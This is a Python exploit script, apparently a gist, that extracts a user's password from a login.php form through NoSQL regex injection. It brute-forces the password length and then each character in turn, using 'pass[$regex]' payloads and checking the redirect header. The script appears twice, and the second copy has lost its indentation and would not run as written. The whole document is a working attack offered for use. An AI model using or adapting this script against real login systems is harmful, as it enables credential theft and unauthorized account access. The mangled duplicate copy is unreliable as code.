Esonhugh/exploit_nosqli.py

## exploit_nosqli.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys, requests

target = "http://<target>/login.php"
post_form = 'user=admin&pass[$regex]={}&remember=on'
post_form = post_form.replace("admin","pedro")

header = {
    "User-Agent":"curl/7.74.0",
    "Content-Type": "application/x-www-form-urlencoded"
    }

def regex_gen(args :str, rest :int):
    if rest < 0:
        return None
    regex = "^{}".format(args)
    regex += "." * rest
    regex += "$"
    return regex

def len_burp(len_you_guess :int ):
    # return "^.{"+len_you_guess+"}$"
    return "^"+ "."*len_you_guess +"$"

def is_success(resp):
    #if resp.status_code == 302:
    #    print("302 get ")
    # print(resp.headers.get("location"))
    if resp.headers.get("location") == "/?err=1":
        return False
    return True

def len_brute(r :requests.Session):
    for i in range(1, 25):
        # max range is 25 if you need you can make there a infinity loop break while true
        post = post_form.format(len_burp(i))
        c = r.post(url=target, data=post, allow_redirects=False,headers=header)
        print("=======\n times:",i,":",is_success(c))
        if is_success(c):
            return i
    return None

def post_it(r :requests.Session,post):
    c = r.post(url=target, data=post, allow_redirects=False, headers=header)
    return is_success(c)


def main():
    r = requests.Session()
    c = r.get(url=target.replace("login.php",""))
    print(target)
    print(c.status_code,c.headers)
    pass_len = len_brute(r)

    sample = "abcdefghijklmnopqrestuvwxy1234567890ABCDEFGHIJKLMNOPQRSTUVWXIYZ`!@#$%"   # the char sample

    prefix = ""
    for s in range(pass_len):  # char index
        for i in sample:  # char Brute/Guesser
            arg = prefix + i
            regex = regex_gen(arg,pass_len-s-1)
            print(regex)
            if post_it(r,post_form.format(regex)) :
                prefix = arg
                break

    print("final_pass = ",prefix)


if __name__ == "__main__":
    main()
	#!/usr/bin/env python
	# -- coding: utf-8 --

	import sys, requests

	target = "http://<target>/login.php"
	post_form = 'user=admin&pass[$regex]={}&remember=on'
	post_form = post_form.replace("admin","pedro")

	header = {
	"User-Agent":"curl/7.74.0",
	"Content-Type": "application/x-www-form-urlencoded"
	}

	def regex_gen(args :str, rest :int):
	if rest < 0:
	return None
	regex = "^{}".format(args)
	regex += "." * rest
	regex += "$"
	return regex

	def len_burp(len_you_guess :int ):
	# return "^.{"+len_you_guess+"}$"
	return "^"+ "."*len_you_guess +"$"

	def is_success(resp):
	#if resp.status_code == 302:
	# print("302 get ")
	# print(resp.headers.get("location"))
	if resp.headers.get("location") == "/?err=1":
	return False
	return True

	def len_brute(r :requests.Session):
	for i in range(1, 25):
	# max range is 25 if you need you can make there a infinity loop break while true
	post = post_form.format(len_burp(i))
	c = r.post(url=target, data=post, allow_redirects=False,headers=header)
	print("=======\n times:",i,":",is_success(c))
	if is_success(c):
	return i
	return None

	def post_it(r :requests.Session,post):
	c = r.post(url=target, data=post, allow_redirects=False, headers=header)
	return is_success(c)


	def main():
	r = requests.Session()
	c = r.get(url=target.replace("login.php",""))
	print(target)
	print(c.status_code,c.headers)
	pass_len = len_brute(r)

	sample = "abcdefghijklmnopqrestuvwxy1234567890ABCDEFGHIJKLMNOPQRSTUVWXIYZ`!@#$%" # the char sample

	prefix = ""
	for s in range(pass_len): # char index
	for i in sample: # char Brute/Guesser
	arg = prefix + i
	regex = regex_gen(arg,pass_len-s-1)
	print(regex)
	if post_it(r,post_form.format(regex)) :
	prefix = arg
	break

	print("final_pass = ",prefix)


	if __name__ == "__main__":
	main()